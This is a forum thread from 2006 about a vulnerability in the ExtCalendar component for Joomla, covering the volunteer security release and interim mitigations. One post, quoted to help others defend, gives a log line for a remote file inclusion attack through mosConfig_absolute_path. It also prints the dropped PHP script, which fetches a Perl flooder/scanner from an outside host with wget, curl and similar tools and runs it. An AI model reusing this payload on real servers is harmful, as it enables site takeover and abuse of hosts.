[UPGRADE AVAIL.] ExtCalendar Vulnerability

For all Non-Joomla! security issues. ie 3pd Components etc.

Moderator: General Support Moderators

Forum rules
Locked
User avatar
RobinH
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 177
Joined: Mon Sep 19, 2005 6:29 pm
Location: Lake Norman, North Carolina, USA

Re: ExtCalendar

Post by RobinH » Fri Jul 14, 2006 4:20 pm

Buster wrote: That's strange, the last e-mail I got from the developer it was a HE not SHE and his name is David.  Has he had surgery? :)
Okay....mmmm... Elpie is the name, and the avatar is very feminine but definitely not a David...
Last edited by RobinH on Fri Jul 14, 2006 4:40 pm, edited 1 time in total.

User avatar
leolam
Joomla! Master
Joomla! Master
Posts: 20651
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ Germany/ S'pore/Bogor/ North America
Contact:

Re: ExtCalendar

Post by leolam » Fri Jul 14, 2006 4:21 pm

Buster wrote: That's strange, the last e-mail I got from the developer it was a HE not SHE and his name is David.  Has he had surgery? :)
Buster,
your post is almost at the bottom of page no. 3...guess what has been written befiore? :)
what happend to that avatar of yours anyhow? :)
Leo
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -

User avatar
leolam
Joomla! Master
Joomla! Master
Posts: 20651
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ Germany/ S'pore/Bogor/ North America
Contact:

Re: ExtCalendar

Post by leolam » Fri Jul 14, 2006 4:22 pm

RobinH wrote:
Buster wrote: That's strange, the last e-mail I got from the developer it was a HE not SHE and his name is David.  Has he had surgery? :)
if you tell Lynne that she has had surgery....beware!

cheers :)
Leo
Last edited by leolam on Fri Jul 14, 2006 4:52 pm, edited 1 time in total.
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -

User avatar
RobinH
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 177
Joined: Mon Sep 19, 2005 6:29 pm
Location: Lake Norman, North Carolina, USA

Re: ExtCalendar

Post by RobinH » Fri Jul 14, 2006 4:23 pm

By the way Buster, the readme file is from a David, so it appears to be a team effort!
Last edited by RobinH on Fri Jul 14, 2006 4:41 pm, edited 1 time in total.

User avatar
leolam
Joomla! Master
Joomla! Master
Posts: 20651
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ Germany/ S'pore/Bogor/ North America
Contact:

Re: ExtCalendar

Post by leolam » Fri Jul 14, 2006 4:38 pm

Elpie,
the read-me file has some issues..i have send them to you...your pm is almost full..cheers
Leo
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -

User avatar
infograf768
Joomla! Master
Joomla! Master
Posts: 19133
Joined: Fri Aug 12, 2005 3:47 pm
Location: **Translation Matters**

Re: ExtCalendar

Post by infograf768 » Fri Jul 14, 2006 4:58 pm

May I insist, as this thread is getting quite complex, for all to keep OT?
No flame, no surgery please.
Keep the flame personal and the surgery to the humour zone.

Any further OT will be edited/deleted.
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group

User avatar
Buster
Joomla! Guru
Joomla! Guru
Posts: 619
Joined: Mon Nov 28, 2005 10:29 am
Location: England

Re: ExtCalendar

Post by Buster » Fri Jul 14, 2006 5:08 pm

Hi Robin

thanks for letting me know.  I spoke to David in April and he said he was looking for help or to hand the project off to someone to develop ExtCalendar and if Elpie is working on it then it should be very good - any chance of a copy of the RC1 anywhere?

Buster

PS. Infograf, no worries Leolam loves me really it's a football thing!
A true Panspermian........aren't we all?

User avatar
RobinH
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 177
Joined: Mon Sep 19, 2005 6:29 pm
Location: Lake Norman, North Carolina, USA

Re: ExtCalendar

Post by RobinH » Fri Jul 14, 2006 5:14 pm

Buster wrote: Hi Robin

thanks for letting me know.  I spoke to David in April and he said he was looking for help or to hand the project off to someone to develop ExtCalendar and if Elpie is working on it then it should be very good - any chance of a copy of the RC1 anywhere?

Buster

PS. Infograf, no worries Leolam loves me really it's a football thing!
You'd have to contact Elpie... I boo boo'd...

davidrrm
Joomla! Explorer
Joomla! Explorer
Posts: 251
Joined: Mon Sep 05, 2005 3:50 pm

Re: ExtCalendar

Post by davidrrm » Sat Jul 15, 2006 12:50 am

To clear up any confusion, I'm the David working on the security release of ExtCalendar and I'm not David Raison. I just stepped up to the plate to help out with a security release of ExtCalendar. This is going to be a security only update.

A few more issues to resolve and we should be good to go.

david

User avatar
RobinH
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 177
Joined: Mon Sep 19, 2005 6:29 pm
Location: Lake Norman, North Carolina, USA

Re: ExtCalendar

Post by RobinH » Sat Jul 15, 2006 1:37 am

davidrrm wrote: To clear up any confusion, I'm the David working on the security release of ExtCalendar and I'm not David Raison. I just stepped up to the plate to help out with a security release of ExtCalendar. This is going to be a security only update.

A few more issues to resolve and we should be good to go.

david
Hey David, I posted my testing results over on Mambo Guru Forums.  Didn't know who to send them to and had to go catch some z's.  PM'd Elpie but she was offline and I had to go and didn't want anyone to miss the results. She PM'd me earlier about the testing.  I'll pop off one to you too. Thanks for inviting me to help with the testing!

User avatar
Elpie
Joomla! Guru
Joomla! Guru
Posts: 903
Joined: Wed Aug 17, 2005 11:26 pm
Contact:

Re: ExtCalendar

Post by Elpie » Sat Jul 15, 2006 2:37 am

Ok, I guess there is enough confusion out there that perhaps some clarity should be given.

The original developer of ExtCalendar, David Raison, stopped working on it some time ago. When the security issues came up, I tried to contact him with no success, as did members of the Joomla team. There are too many people using ExtCalendar for it to just be left as abandonware so when davidrrm offered his help with it on this forum and nobody took him up on the offer, I contacted him and also asked Martin Brampton (counterpoint) if they were prepared to work together to bring us a security update. David is a hugely talented and experienced coder, as is Martin, and I am not working on this code at all. My contribution is simply in bringing the people together, helping the guys where I can, and taking care of the information and people side of things ;)

As Phil said, we found there was a lot more work involved than originally anticipated and discovered a number of potential vulnerabilities (that have not, as yet, become exploits).  We have RC2 out for testing and are trying to get this out to you as soon as possible.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info

boardmoose
Joomla! Apprentice
Joomla! Apprentice
Posts: 8
Joined: Thu Jul 13, 2006 12:51 pm

Re: ExtCalendar

Post by boardmoose » Sat Jul 15, 2006 5:43 pm

Any news?  I'm being patient, but I swear I check this thread at least two times every hour, hoping that the email notification didn't work and there's a new reply with news of the security fix waiting for me.  ;) I'm eagerly anticipating it! Thanks again to those of you working on this project.  I appreciate your efforts!!

User avatar
leolam
Joomla! Master
Joomla! Master
Posts: 20651
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ Germany/ S'pore/Bogor/ North America
Contact:

Re: ExtCalendar

Post by leolam » Sat Jul 15, 2006 5:55 pm

boardmoose wrote: Any news?  I'm being patient, but I swear I check this thread at least two times every hour, hoping that the email notification didn't work and there's a new reply with news of the security fix waiting for me.  ;) I'm eagerly anticipating it! Thanks again to those of you working on this project.  I appreciate your efforts!!
This is a little bit much more than a security fix......many people around the globe are now testing version RC2 and believe me it looks very promissing and I expect that the developers can release very quickly now...It will take another day or so depending on what "elpie" we find but they (Martin, David and Elpie and many more now involved)  are amazing talented people bringing the goods to us in this community. Be patient and your rewards will be endless...these people do not provide quick fixes  They provide structural solutions.....and again from our testings as well the solution looks quit good! soon my friend....soon....
cheers
Leo

edited: because amazing interference
Last edited by leolam on Tue Jul 18, 2006 9:39 am, edited 1 time in total.
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -

User avatar
RobinH
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 177
Joined: Mon Sep 19, 2005 6:29 pm
Location: Lake Norman, North Carolina, USA

Re: ExtCalendar

Post by RobinH » Sun Jul 16, 2006 3:26 am

Initial results look VERY proimising!

emma
Joomla! Apprentice
Joomla! Apprentice
Posts: 6
Joined: Mon Jul 17, 2006 11:30 am

Re: ExtCalendar

Post by emma » Mon Jul 17, 2006 11:34 am

Hi Robin,

Do you have any news an I worried about my site and would like to know what to do asap.

;D Thank you, Kindest Regards, Emma

User avatar
Elpie
Joomla! Guru
Joomla! Guru
Posts: 903
Joined: Wed Aug 17, 2005 11:26 pm
Contact:

Re: ExtCalendar

Post by Elpie » Mon Jul 17, 2006 11:46 am

Emma, please disable your ExtCalendar by changing file permissions to 000. We are in the final phases of testing but as this is a full upgrade that fixes a lot of security issues it has been a lot more work than just a simple patch.  I can't give a time for its release but we are trying to get a stable, fully-tested upgrade out as soon as possible.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info

User avatar
RobinH
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 177
Joined: Mon Sep 19, 2005 6:29 pm
Location: Lake Norman, North Carolina, USA

Re: ExtCalendar

Post by RobinH » Mon Jul 17, 2006 12:32 pm

I'm not responsible for the release, just helping with testing, so not sure when its coming out but again - feel it'll be very soon.

emma
Joomla! Apprentice
Joomla! Apprentice
Posts: 6
Joined: Mon Jul 17, 2006 11:30 am

Re: ExtCalendar

Post by emma » Mon Jul 17, 2006 1:27 pm

Thanks for the info...i dont really want to have to do that though as it is a main source of info on the site. Is there any other temporary solution for now you can think of?

Kindest Regards, Emma

User avatar
nathandiehl
Joomla! Champion
Joomla! Champion
Posts: 6044
Joined: Fri Aug 19, 2005 3:03 pm
Location: Indiana, USA
Contact:

Re: ExtCalendar

Post by nathandiehl » Mon Jul 17, 2006 2:11 pm

Emma,
a temporary solution could be to run RC2 on your life site, but this is certainly not stable, and they don't know if it's secure or not.

the ONLY sure thing is to disable extCal.
If you're new to Joomla, Please read Anna's Joomla! Tips: http://forum.joomla.org/viewtopic.php?t=5503

http://nathandiehl.com | Find out what makes me tick

User avatar
Elpie
Joomla! Guru
Joomla! Guru
Posts: 903
Joined: Wed Aug 17, 2005 11:26 pm
Contact:

Re: ExtCalendar

Post by Elpie » Mon Jul 17, 2006 2:14 pm

You could go through every single file and add this to the top (just below the < ? php starting code)

Code: Select all

// Don't allow direct linking
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' ); 
This will help defend against the most common attack we are seeing against ExtCalendar BUT it will still not be secure. If you can, also set register_globals OFF (your host may be willing to do this so globals are off server-wide, which they should be for security) - there is more information about register_globals in this forum.  That will also help protect your site, but not completely secure ExtCalendar. 

Most importantly, BACKUP, BACKUP, BACKUP.  There is a risk your site may be found by hackers, but you are the only one to decide what level of risk you are prepared to take. With daily backups of your database (and files if restoring them from scratch would be a hassle) you can at least come back fairly quickly if your site is exploited. Up to you to decide.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info

User avatar
Elpie
Joomla! Guru
Joomla! Guru
Posts: 903
Joined: Wed Aug 17, 2005 11:26 pm
Contact:

Re: ExtCalendar

Post by Elpie » Mon Jul 17, 2006 2:22 pm

nathandiehl wrote: a temporary solution could be to run RC2 on your life site, but this is certainly not stable, and they don't know if it's secure or not.
RC2 is not available to anyone except our testers at the moment nathan. Because we are doing extensive testing on it we are also uncovering a few bugs that must have been bothering people for some time. We did not intend to do more than a security release, but we have ended up fixing a few things as well. An RC3 will be out today and hopefully this will pass our rigorous testing and we will be good to go.
The upgrade is being designed to work with both Joomla and Mambo, is being tested across versions and on both Linux and IIS. We felt ExtCalendar is too important to too many people for the release to be rushed and we want to be as sure as possible that its a solid upgrade.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info

User avatar
sc00zy
Joomla! Exemplar
Joomla! Exemplar
Posts: 9532
Joined: Thu Aug 18, 2005 9:07 am
Location: Assen, Netherlands
Contact:

Re: ExtCalendar

Post by sc00zy » Mon Jul 17, 2006 3:09 pm

Elpie wrote: Emma, please disable your ExtCalendar by changing file permissions to 000. We are in the final phases of testing but as this is a full upgrade that fixes a lot of security issues it has been a lot more work than just a simple patch.  I can't give a time for its release but we are trying to get a stable, fully-tested upgrade out as soon as possible.
Simply set all permissions on files and folders within com_extcalendar would be fine?
Arjan Menger
https://welldotcom.nl - Puntgaaf Internetbureau

User avatar
Elpie
Joomla! Guru
Joomla! Guru
Posts: 903
Joined: Wed Aug 17, 2005 11:26 pm
Contact:

Re: ExtCalendar

Post by Elpie » Mon Jul 17, 2006 3:46 pm

sc00zy wrote: Simply set all permissions on files and folders within com_extcalendar would be fine?
If you set them to 000, so nobody and no user and no group has access, you will completely disable ExtCalendar but it should then be safe until we can release the update.  Removing all ExtCalendar files through FTP will have the same effect - DON'T remove through Joomla or you will lose all your ExtCalendar data tables and lose all information.  If you want to keep it running on your site though you will need to follow the advice I gave Emma and weigh up the risks of it possibly being exploited.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info

User avatar
sc00zy
Joomla! Exemplar
Joomla! Exemplar
Posts: 9532
Joined: Thu Aug 18, 2005 9:07 am
Location: Assen, Netherlands
Contact:

Re: ExtCalendar

Post by sc00zy » Mon Jul 17, 2006 3:49 pm

Thanks. I will temporary delete the files.
Arjan Menger
https://welldotcom.nl - Puntgaaf Internetbureau

technopuzzle
Joomla! Ace
Joomla! Ace
Posts: 1942
Joined: Thu Aug 18, 2005 5:53 pm
Location: Washington D.C. & Baltimore, MD Metro
Contact:

Re: ExtCalendar

Post by technopuzzle » Mon Jul 17, 2006 7:54 pm

Hi all,

After scanning through the pages of this thread I didn't see any mention of extcal being used for SPAM purposes.

My personal site was hacked via extcal and used to send out SPAM. The SPAM was sent out using the backend extcal admin configuration where you can configure the "admin" to be notified of new front-end submissions.

The funny thing is is that I had previously removed any mention of extcal in my menu's and had already removed the publicly viewable extcal public copyright notices, as well as unpublished any and all references to extcal (since I was no longer using it on my site). I had just never uninstalled it.

Yet it still got hacked. I also find it interesting that my personal site has never been submitted to ANY search engines, yet somehow it was found and used.

Just my 2-cents and thought I'd report on the SPAM aspect since I didn't see it mentioned anywhere.

--Roger
Thanks,
Roger Raymond
Techno Puzzle

arcasta
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Tue Jul 18, 2006 12:19 am

Re: ExtCalendar -- here is the script used to break in

Post by arcasta » Tue Jul 18, 2006 12:29 am

Hello Everyone,

My calendar was hacked as well so I've disabled it. They came back today and I found some interesting breadcrumbs in the access_log.

Perhaps this will help devise a defense.

Code: Select all

9600: 65.75.190.45 - - [17/Jul/2006:20:09:10 -0400] "GET /web/component/option,com_extcalendar/Itemid,/extmode,view/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.aol.eu.com/cc2.php??
Which grabs these interesting scripts:

Code: Select all

<?
shell_exec('cd /tmp;wget http://www.aol.eu.com/nowka.txt;perl nowka.txt;touch .paka;rm nowka.txt.*');
shell_exec('cd /tmp;curl -O http://www.aol.eu.com/nowka.txt;perl nowka.txt;touch .paka;rm nowka.txt.*');
shell_exec('cd /tmp;lwp-download http://www.aol.eu.com/nowka.txt;perl nowka.txt;touch .paka;rm nowka.txt.*');
shell_exec('cd /tmp;lynx -source http://www.aol.eu.com/nowka.txt >batek.txt;perl batek.txt;touch .paka;rm batek.txt.*');
shell_exec('cd /tmp;fetch http://www.aol.eu.com/nowka.txt >batek.txt;perl batek.txt;touch .paka;rm batek.txt.*');
shell_exec('cd /tmp;GET http://www.aol.eu.com/nowka.txt >batek.txt;perl batek.txt;touch .paka;rm batek.txt.*');
?>
http://www.aol.eu.com/nowka.txt for example is a spreader/portscanner/udpflooder

So now what should we do if our systems are compromised (change passwords, permissions)?

Suggestions?

Thanks

Tony

User avatar
Elpie
Joomla! Guru
Joomla! Guru
Posts: 903
Joined: Wed Aug 17, 2005 11:26 pm
Contact:

Re: ExtCalendar

Post by Elpie » Tue Jul 18, 2006 1:54 am

Tony, please read the threads here about what to do if you have been hacked.
This exploit needed only one thing on your site for it to be run - register_globals On.  There is information here about how to turn register_globals Off if your host won't do that for you.

What you need to do now is this:
1. contact your host and inform them that your site has been hacked (and give them the log information you posted here)
Ask your host to change register_globals to Off.
2.If your host has a full backup, you should clean out the injected files then restore your site from backup. It is extremely important that you dont miss any hacker files.
3. Read the posts here about securing your site.
4. Trace the owner of the IP that was used and report the abuse.
5. Contact aol.eu.com and report the abuse.

Good luck!
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info

LeonZ
Joomla! Apprentice
Joomla! Apprentice
Posts: 9
Joined: Thu Aug 18, 2005 12:30 pm

Re: ExtCalendar

Post by LeonZ » Tue Jul 18, 2006 8:40 am

Hi All,

I was also hacked and I changed the globals.php file as mentioned somewhere else on this site by RobS. (Changed the rg_emulation to 0). Everything seemed to work just fine except the Joomlaboard and pmsII. I had to change it back unfortunately.

Just in case someone else wants to do this for security.

emma
Joomla! Apprentice
Joomla! Apprentice
Posts: 6
Joined: Mon Jul 17, 2006 11:30 am

Re: ExtCalendar

Post by emma » Tue Jul 18, 2006 9:20 am

just changed file permissions to 000 and it has taken down the whole site...please help me asap.

gws
Joomla! Champion
Joomla! Champion
Posts: 5883
Joined: Tue Aug 23, 2005 1:56 pm
Location: South coast, UK
Contact:

Re: ExtCalendar

Post by gws » Tue Jul 18, 2006 9:25 am

Change them back and then change each one,one at a time and check your site. I suspect that you have changed other files than extcalendar.


Locked

Return to “3rd Party/Non Joomla! Security Issues”